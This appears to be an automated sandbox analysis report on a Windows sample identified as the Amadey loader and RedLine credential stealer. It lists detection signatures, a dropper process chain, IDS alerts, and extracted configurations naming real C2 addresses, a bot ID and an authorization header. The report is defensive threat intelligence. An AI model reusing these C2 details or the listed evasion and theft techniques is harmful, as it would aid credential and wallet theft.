Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:808971
MD5:33f01dc275ffa0c5989f8630eb4279b5
SHA1:65e07e1c5d25a9d9817664a11d603dd7a5e21a6f
SHA256:e8d4d6a87f54b65a7a04e7ccd0da266638f71e4c2b4d309eff8a5d79b48c058f
Tags:exe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
.NET source code references suspicious native API functions
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • file.exe (PID: 4228 cmdline: C:\Users\user\Desktop\file.exe MD5: 33F01DC275FFA0C5989F8630EB4279B5)
    • gck46uD.exe (PID: 6024 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe MD5: 4C0E7D70D851B36C6338565474276043)
      • gDR79xP.exe (PID: 6020 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe MD5: 57EB0A896C2D871FDCCB5F4A5765F84D)
        • gOk22TE.exe (PID: 6108 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe MD5: 169FAA6C3CA7D213D20BDC00810116B8)
          • aWM14.exe (PID: 6100 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
          • bRz07Kk.exe (PID: 4812 cmdline: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe MD5: DD0C9E110C68CE1FA5308979EF718F7B)
  • rundll32.exe (PID: 5148 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 2136 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 3112 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 732 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "193.233.20.2/Bn89hku/index.php", "Version": "3.66"}
{"C2 url": "193.233.20.13:4136", "Bot Id": "dubka", "Authorization Header": "e5a9421183a033f283b2f23139b471f0"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a438:$pat14: , CommandLine:
  • 0x134ab:$v2_1: ListOfProcesses
  • 0x1328a:$v4_3: base64str
  • 0x13e03:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1281d:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security

Source | Rule | Description | Author | Strings
00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
00000006.00000000.277000636.00000000001E2000.00000002.00000001.01000000.0000000A.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
Process Memory Space: bRz07Kk.exe PID: 4812 | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

Source | Rule | Description | Author | Strings
3.3.gOk22TE.exe.4c0bc20.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
3.3.gOk22TE.exe.4c0bc20.0.raw.unpack | MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
  • 0x1a438:$pat14: , CommandLine:
  • 0x134ab:$v2_1: ListOfProcesses
  • 0x1328a:$v4_3: base64str
  • 0x13e03:$v4_4: stringKey
  • 0x11b63:$v4_5: BytesToStringConverted
  • 0x10d76:$v4_6: FromBase64
  • 0x12098:$v4_8: procName
  • 0x1281d:$v5_5: FileScanning
  • 0x11d6c:$v5_7: RecordHeaderField
  • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
1.3.gck46uD.exe.497cc20.0.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
1.3.gck46uD.exe.497cc20.0.raw.unpack | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security
3.3.gOk22TE.exe.4c0bc20.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security

No Sigma rule has matched

Timestamp:02/15/23-21:48:41.150000
Source IP:193.233.20.13
Destination IP:192.168.2.3
SID:2043234
Source Port:4136
Destination Port:49702
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:02/15/23-21:48:39.233243
Source IP:192.168.2.3
Destination IP:193.233.20.13
SID:2043233
Source Port:49702
Destination Port:4136
Protocol:TCP
Classtype:A Network Trojan was detected

Timestamp:02/15/23-21:48:58.203132
Source IP:192.168.2.3
Destination IP:193.233.20.13
SID:2043231
Source Port:49702
Destination Port:4136
Protocol:TCP
Classtype:A Network Trojan was detected
AV Detection

Source: file.exe | Virustotal: Detection: 56%
Source: file.exe | Avira: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Avira: detection malicious, Label: HEUR/AGEN.1252166
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\dEX81lT.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ckg5133.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\fcC6215.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\aWM14.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bRz07Kk.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Joe Sandbox ML: detected
Source: 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "193.233.20.13:4136", "Bot Id": "dubka", "Authorization Header": "e5a9421183a033f283b2f23139b471f0"}
Source: 1.3.gck46uD.exe.497cc20.0.raw.unpack | Malware Configuration Extractor: Amadey {"C2 url": "193.233.20.2/Bn89hku/index.php", "Version": "3.66"}
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00052F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00052F1D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Code function: 1_2_00022F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00022F1D
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Code function: 2_2_00102F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_00102F1D
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Code function: 3_2_010E2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,3_2_010E2F1D
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wextract.pdb source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: gck46uD.exe, 00000001.00000003.250210360.00000000048F6000.00000004.00000020.00020000.00000000.sdmp, dEX81lT.exe.1.dr
Source: Binary string: wextract.pdbGCTL source: file.exe, gDR79xP.exe.1.dr, gck46uD.exe.0.dr, gOk22TE.exe.2.dr
Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: gOk22TE.exe, 00000003.00000003.252780522.0000000004C09000.00000004.00000020.00020000.00000000.sdmp, aWM14.exe, 00000004.00000000.253025851.0000000000F22000.00000002.00000001.01000000.00000007.sdmp, aWM14.exe.3.dr
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00052390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00052390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\gck46uD.exe | Code function: 1_2_00022390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00022390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\gDR79xP.exe | Code function: 2_2_00102390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_00102390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\gOk22TE.exe | Code function: 3_2_010E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_010E2390

Networking

Source: Traffic | Snort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49702 -> 193.233.20.13:4136
Source: Traffic | Snort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49702 -> 193.233.20.13:4136
Source: Traffic | Snort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.13:4136 -> 192.168.2.3:49702
Source: Malware configuration extractor | URLs: 193.233.20.2/Bn89hku/index.php
Source: Malware configuration extractor | URLs: 193.233.20.13:4136
Source: Joe Sandbox View | ASN Name: REDCOM-ASRedcomKhabarovskRussiaRU
Source: Joe Sandbox View | IP Address: 193.233.20.13
Source: global traffic | TCP traffic: 192.168.2.3:49702 -> 193.233.20.13:4136
Source: unknown | TCP traffic detected without corresponding DNS query: 193.233.20.13
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002887000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.00000000025FF000.00000004.00000800.00020000.00000000.sdmp, bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                            Source: bRz07Kk.exe, 00000006.00000002.357708027.0000000002571000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
